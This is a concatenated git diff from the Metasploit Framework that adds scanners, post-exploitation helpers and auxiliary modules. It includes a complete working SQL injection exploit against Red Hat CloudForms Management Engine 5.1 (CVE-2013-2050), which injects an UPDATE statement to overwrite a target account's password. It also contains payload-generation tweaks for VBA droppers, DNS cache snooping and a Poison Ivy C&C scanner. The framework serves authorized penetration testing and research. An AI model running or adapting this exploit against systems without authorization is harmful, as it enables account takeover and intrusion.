MCA_MCCS_VERSION_MISMATCH = 0x3B63 + MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 + MCA_INTERNAL_ERROR = 0x3B65 + MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 + MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 + AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 + SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 + HASH_NOT_SUPPORTED = 0x3BC4 + HASH_NOT_PRESENT = 0x3BC5 + +end diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index b517358a15..2893e9b640 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -292,7 +292,7 @@ module Services # Now to grab a handle to the service. # Thank you, Wine project for defining the DELETE constant since it, # and all its friends, are missing from the MSDN docs. - # #define DELETE 0x00010000 + # #define DELETE 0x00010000 handle = adv.OpenServiceA(manager, name, 0x10000) if (handle["return"] == 0) raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") @@ -306,6 +306,50 @@ module Services handle["GetLastError"] end end + + # + # Query Service Status + # + # @param (see #service_start) + # + # @return {} representing lpServiceStatus + # + # @raise (see #service_start) + # + # + def service_status(name, server=nil) + adv = session.railgun.advapi32 + ret = nil + + # 0x80000000 GENERIC_READ + open_sc_manager(:host => server, :access => 0x80000000) do |manager| + # Now to grab a handle to the service. + handle = adv.OpenServiceA(manager, name, 0x80000000) + if (handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + + status = adv.QueryServiceStatus(handle["return"],28) + if (status["return"] == 0) + raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}") + end + + vals = status['lpServiceStatus'].unpack('L*') + adv.CloseServiceHandle(handle["return"]) + + ret = { + :type => vals[0], + :state => vals[1], + :controls_accepted => vals[2], + :win32_exit_code => vals[3], + :service_exit_code => vals[4], + :check_point => vals[5], + :wait_hint => vals[6] + } + end + + return ret + end end end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 12b1242090..a5d4fc147f 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={}) hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8) # Specify the payload in hex as an extra file.. payload_hex = exe.unpack('H*')[0] diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 6bba493bb8..1bd5427bff 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'metasm' module Rex module ElfScan @@ -27,6 +28,26 @@ class Generic rva = hit[0] message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1] $stdout.puts elf.ptr_s(rva) + " " + message + if(param['disasm']) + message.gsub!("; ", "\n") + if message.include?("retn") + message.gsub!("retn", "ret") + end + + begin + d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble + rescue Metasm::ParseError + d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*')) + end + + addr = 0 + while ((di = d2.disassemble_instruction(addr))) + disasm = "0x%08x\t" % (rva + addr) + disasm << di.instruction.to_s + $stdout.puts disasm + addr = di.next_addr + end + end end end @@ -203,4 +224,3 @@ end end end end - diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb index 7db494335b..95177c31cd 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb @@ -27,6 +27,10 @@ class Def_advapi32 def self.create_dll(dll_path = 'advapi32') dll = DLL.new(dll_path, ApiConstants.manager) + dll.add_function('QueryServiceStatus', 'DWORD', [ + ['LPVOID', 'hService', 'in'], + ['PBLOB', 'lpServiceStatus', 'out']]) + dll.add_function('CredEnumerateA', 'BOOL', [ ['PCHAR', 'Filter', 'in'], ['DWORD', 'Flags', 'in'], @@ -2089,10 +2093,8 @@ class Def_advapi32 ["PBLOB","pvContext","in"], ]) - return dll end - end end; end; end; end; end; end; end diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 6f1d79d1c7..bd07281f2d 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary | - template = template.gsub(/^\t\t/, '') + template = template.gsub(/^ {4}/, '') template = template.gsub(/\n/, '') connect diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb new file mode 100644 index 0000000000..633e009fe4 --- /dev/null +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -0,0 +1,175 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'bcrypt' +require 'digest' +require 'openssl' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability in the "explorer" + action of "miq_policy" controller of the Red Hat CloudForms Management + Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by + changing the password of the target account to the specified password. + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2050'], + ['CWE', '89'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062'] + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'DisclosureDate' => 'Nov 12 2013' + ) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'Your username']), + OptString.new('PASSWORD', [true, 'Your password']), + OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']), + OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) + ], self.class + ) + end + + def password_for_newer_schema + # Newer versions use ActiveModel's SecurePassword. + BCrypt::Password.create(datastore['TARGETPASSWORD']) + end + + def password_for_older_schema + # Older versions use ManageIQ's MiqPassword. + if datastore['TARGETPASSWORD'].empty? + 'v1:{}' + else + password = '1234567890123456' + salt = '6543210987654321' + cipher = OpenSSL::Cipher.new('AES-256-CBC') + cipher.encrypt + cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32] + encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final + "v1:{#{Rex::Text.encode_base64(encrypted)}}" + end + end + + def password_reset? + print_status("Trying to log into #{target_url('dashboard')} using the target account...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['TARGETUSERNAME'], + 'user_password' => datastore['TARGETPASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return false + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + false + else + true + end + end + + def run + print_status("Logging into #{target_url('dashboard')}...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'), + 'vars_post' => { + 'user_name' => datastore['USERNAME'], + 'user_password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.body =~ /"Error: (.*)"/ + print_error($1) + return + else + session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/ + + if session.nil? + print_error('Failed to retrieve the current session id') + return + end + end + + # Newer versions don't accept POST requests. + print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + 'vars_get' => { + 'profile[]' => value_for_newer_schema + } + ) + + if password_reset? + print_good('Password reset successfully') + return + else + print_error('Failed to reset password') + end + + print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...") + send_request_cgi( + 'cookie' => "_vmdb_session=#{session}", + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'profile[]' => value_for_older_schema + } + ) + + if password_reset? + print_good('Password reset successfully') + else + print_error('Failed to reset password') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end + + def value_for_newer_schema + "1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end + + def value_for_older_schema + "1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --" + end +end diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 72e8b1d846..fd96ab685d 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) + if ports.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + ports.each_with_index do |port,i| p.tcp_dst = port p.tcp_src = rand(64511)+1024 diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb new file mode 100644 index 0000000000..bc3294ce3a --- /dev/null +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/dns/resolver' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Non-Recursive Record Scraper', + 'Description' => %q{ + This module can be used to scrape records that have been cached + by a specific nameserver. The module allows the user to test + every record from a specified file. + }, + 'Author' => [ + 'Brandon McCann "zeknox" ', + 'Rob Dixon "304geek" ' + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'], + ['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf'] + ])) + + register_options([ + OptString.new('DOMAIN', [ false, "Domain name to query for"]), + OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]), + OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]), + ], self.class) + + register_advanced_options([ + OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]), + OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5]) + ], self.class) + end + + # method to scrape dns + def scrape_dns(domain) + + # dns request with recursive disabled + use_tcp = datastore['TCP_DNS'] + res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) + use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT'] + + # query dns + begin + query = res.send(domain) + rescue ResolverArgumentError + print_error("Invalid domain: #{domain}") + return + rescue NoResponseError + print_error("DNS Timeout Issue: #{domain}") + return + end + + # found or not found + if query.answer.empty? + vprint_status("#{domain} - Not Found") + return + end + + @is_vulnerable = true + print_good("#{domain} - Found") + report_goods(domain) + end + + # method to read each line from file + def read_file + ::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line| + scrape_dns(line.chomp) + end + end + + # log results to database + def report_goods(domain) + if datastore['TCP_DNS'] + proto = "tcp" + else + proto = "udp" + end + + report_note( + :host => datastore['NS'], + :name => "dns", + :port => 53, + :proto => proto, + :type => "dns.cache.scrape", + :data => "#{domain} cached", + :update => :unique_data + ) + end + + # main control method + def run + @is_vulnerable = false + + print_status("Making queries against #{datastore['NS']}") + + if datastore['DOMAIN'].blank? + read_file + else + scrape_dns(datastore['DOMAIN']) + end + + report_vuln( + :host => datastore['NS'], + :name => "DNS Cache Snooping", + ) if @is_vulnerable + end +end + diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb new file mode 100644 index 0000000000..2332fe5995 --- /dev/null +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -0,0 +1,68 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Udp + + def initialize + super( + 'Name' => 'Chargen Probe Utility', + 'Description' => %q{ + Chargen is a debugging and measurement tool and a character + generator service. A character generator service simply sends + data without regard to the input. + Chargen is susceptible to spoofing the source of transmissions + as well as use in a reflection attack vector. The misuse of the + testing features of the Chargen service may allow attackers to + craft malicious network payloads and reflect them by spoofing + the transmission source to effectively direct it to a target. + This can result in traffic loops and service degradation with + large amounts of network traffic. + }, + 'Author' => 'Matteo Cantoni ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood. + [ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ], + [ 'URL', 'http://tools.ietf.org/html/rfc864' ], + ], + 'DisclosureDate' => 'Feb 08 1996') + + register_options([ + Opt::RPORT(19) + ]) + + deregister_options('RHOST') + end + + def run_host(rhost) + begin + connect_udp + pkt = Rex::Text.rand_text_alpha_lower(1) + udp_sock.write(pkt) + r = udp_sock.recvfrom(65535, 0.1) + + if r and r[1] + vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}") + res = r[0].to_s.strip + if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/)) + print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)") + report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length) + end + end + rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused + nil + ensure + disconnect_udp if self.udp_sock + end + end +end diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 87dfc5938c..b879573782 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_nq' + @probes << 'probe_chargen' end @@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary case pkt[2] + when 19 + app = 'chargen' + return unless chargen_parse(pkt[0]) + @results[hkey] = true + when 53 app = 'DNS' ver = nil @@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary "#{res[2]}_#{res[1]}" end + # + # Validate a chargen packet. + # + def chargen_parse(data) + data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i + end + # # Validate this is truly Citrix ICA; returns true or false. # @@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary # The probe definitions # + def probe_chargen(ip) + pkt = Rex::Text.rand_text_alpha_lower(1) + return [pkt, 19] + end + def probe_pkt_dns(ip) data = [rand(0xffff)].pack('n') + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 0051304bba..8f87a3c498 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_nq' + @probes << 'probe_chargen' end def setup @@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary case sport + when 19 + app = 'chargen' + ver = nil + return unless chargen_parse(data) + @results[hkey] = true + when 53 app = 'DNS' ver = nil @@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})") end + # + # Validate a chargen packet. + # + def chargen_parse(data) + data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i + end + # # Parse a db2disco packet. # @@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary # The probe definitions # + def probe_chargen(ip) + pkt = Rex::Text.rand_text_alpha_lower(1) + return [pkt, 19] + end + def probe_pkt_dns(ip) data = [rand(0xffff)].pack('n') + "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 7d189950b6..970bea0a69 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary dead = false portlist = Rex::Socket.portspec_crack(datastore['PORTS']) + if portlist.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + vprint_status("[#{rhost}] Verifying manual testing is not required...") manual = false diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index c8429f9a9c..39c02bac5a 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.body) short_name = res.body.scan(/ 'Poison Ivy Command and Control Scanner', + 'Description' => %q{ + Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script. + }, + 'References' => + [ + ['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'], + ], + 'Author' => ['SeawolfRN'], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]), + OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]), + OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]) + ], self.class) + + deregister_options('RPORT') + + end + + + def run_host(ip) + + timeout = datastore['TIMEOUT'].to_i + + ports = Rex::Socket.portspec_crack(datastore['PORTS']) + + if ports.empty? + raise Msf::OptionValidateError.new(['PORTS']) + end + + while(ports.length > 0) + t = [] + r = [] + begin + 1.upto(datastore['CONCURRENCY']) do + this_port = ports.shift + break if not this_port + t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port| + begin + s = connect(false, + { + 'RPORT' => port, + 'RHOST' => ip, + 'ConnectTimeout' => (timeout / 1000.0) + } + ) + r << [ip,port,"open",'Unknown'] + s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer + data = s.get_once(0x100) + if data.length == 0x100 + data = s.get_once(0x4) + if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C + print_status("#{ip}:#{port} - C&C Server Found") + r << [ip,port,"open",'Poison Ivy C&C'] + end + end + rescue ::Rex::ConnectionRefused + vprint_status("#{ip}:#{port} - TCP closed") + r << [ip,port,"closed",''] + rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error + rescue ::Rex::Post::Meterpreter::RequestError + raise $! + ensure + disconnect(s) rescue nil + end + end + end + t.each {|x| x.join } + + rescue ::Timeout::Error + ensure + t.each {|x| x.kill rescue nil } + end + + r.each do |res| + report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3]) + end + end + end + +end diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index aa6f32d6ab..ad5b2a0b7b 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index 6909cc0ecb..46dbe302ac 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end datastore['RHOST'] = datastore['BOUNCEHOST'] diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index c45cfc4721..b8f6a34c1e 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 5695228f8f..87204f77c7 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end while(ports.length > 0) diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 1cccc48c5a..136e7941b2 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary ports = Rex::Socket.portspec_crack(datastore['PORTS']) if ports.empty? - print_error("Error: No valid ports specified") - return + raise Msf::OptionValidateError.new(['PORTS']) end to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index 3114a85d2a..16b1c4e3d8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary ], 'Author' => [ - 'Royce Davis @R3dy_ ', - 'Brandon McCann @zeknox ' + 'Royce Davis "R3dy" ', + 'Brandon McCann "zeknox" ' ], 'License' => MSF_LICENSE )) diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index ef456cca26..a0e5f758f9 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner + + VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/ def initialize super( @@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']), - OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']), + OptAddress.new('RHOST', [true, 'SAPRouter address', '']), + OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']), + OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']), OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]), OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']), OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']), @@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary # 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002, # 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]), + OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']]) ], self.class) - deregister_options('RPORT') - end # Converts a instance specification like "4,21-23,33" into a sorted, @@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{ip}:#{port} - invalid route") when /reacheable/ vprint_error("#{ip}:#{port} - unreachable") + when /hostname '#{ip}' unknown/ + vprint_error("#{ip}:#{port} - unknown host") + when /GetHostByName: '#{ip}' not found/ + vprint_error("#{ip}:#{port} - unknown host") + when /connection to .* timed out/ + vprint_error("#{ip}:#{port} - connection timed out") + when /partner .* not reached/ + vprint_error("#{ip}:#{port} - host unreachable") else vprint_error("#{ip}:#{port} - unknown error message") end @@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary return nil end + def validate(range) + hosts_list = range.split(",") + return false if hosts_list.nil? or hosts_list.empty? + + hosts_list.each do |host| + unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX + return false + end + end + end + + def run + + if datastore['RESOLVE'] == 'remote' + range = datastore['TARGETS'] + unless validate(range) + print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote") + return + end + + range.split(/,/).each do |host| + run_host(host) + end + else + # resolve IP or crack IP range + ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS']) + ip_list.each do |ip| + run_host(ip) + end + end + + end + def run_host(ip) - - sap_host = datastore['SAPROUTER_HOST'] - sap_port = datastore['SAPROUTER_PORT'] - ports = datastore['PORTS'] # if port definition has NN then we require INSTANCES @@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary ports = build_sap_ports(ports) if ports.empty? - print_error('Error: No valid ports specified') - return + raise Msf::OptionValidateError.new(['PORTS']) end print_status("Scanning #{ip}") @@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary begin # create ni_packet to send to saprouter - routes = {sap_host => sap_port, ip => port} + routes = {rhost => rport, ip => port} ni_packet = build_ni_packet(routes) - s = connect(false, - { - 'RPORT' => sap_port, - 'RHOST' => sap_host - } - ) + s = connect(false) s.write(ni_packet, ni_packet.length) response = s.get() @@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused - print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused") + print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused") rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error rescue ::Rex::Post::Meterpreter::RequestError @@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary r.each do |res| tbl << [res[0], res[1], res[2], res[3]] - report_service(:host => res[0], :port => res[1], :state => res[2]) + # we can't report if resolution is remote, since host is unknown locally + if datastore['RESOLVE'] == 'local' + begin + report_service(:host => res[0], :port => res[1], :state => res[2]) + rescue ActiveRecord::RecordInvalid + # Probably raised because the Address is reserved, for example + # when trying to report a service on 127.0.0.1 + print_warning("Can't report #{res[0]} as host to the database") + end + end end - print_warning("Warning: Service info could be innacurated") + print_warning("Warning: Service info could be inaccurate") print(tbl.to_s) end diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index 713ce9aec0..1d64e481e2 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary def_ports = [ '32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02', '5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16', - '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975', - '59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200', - '7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200', - '8210', '8220', 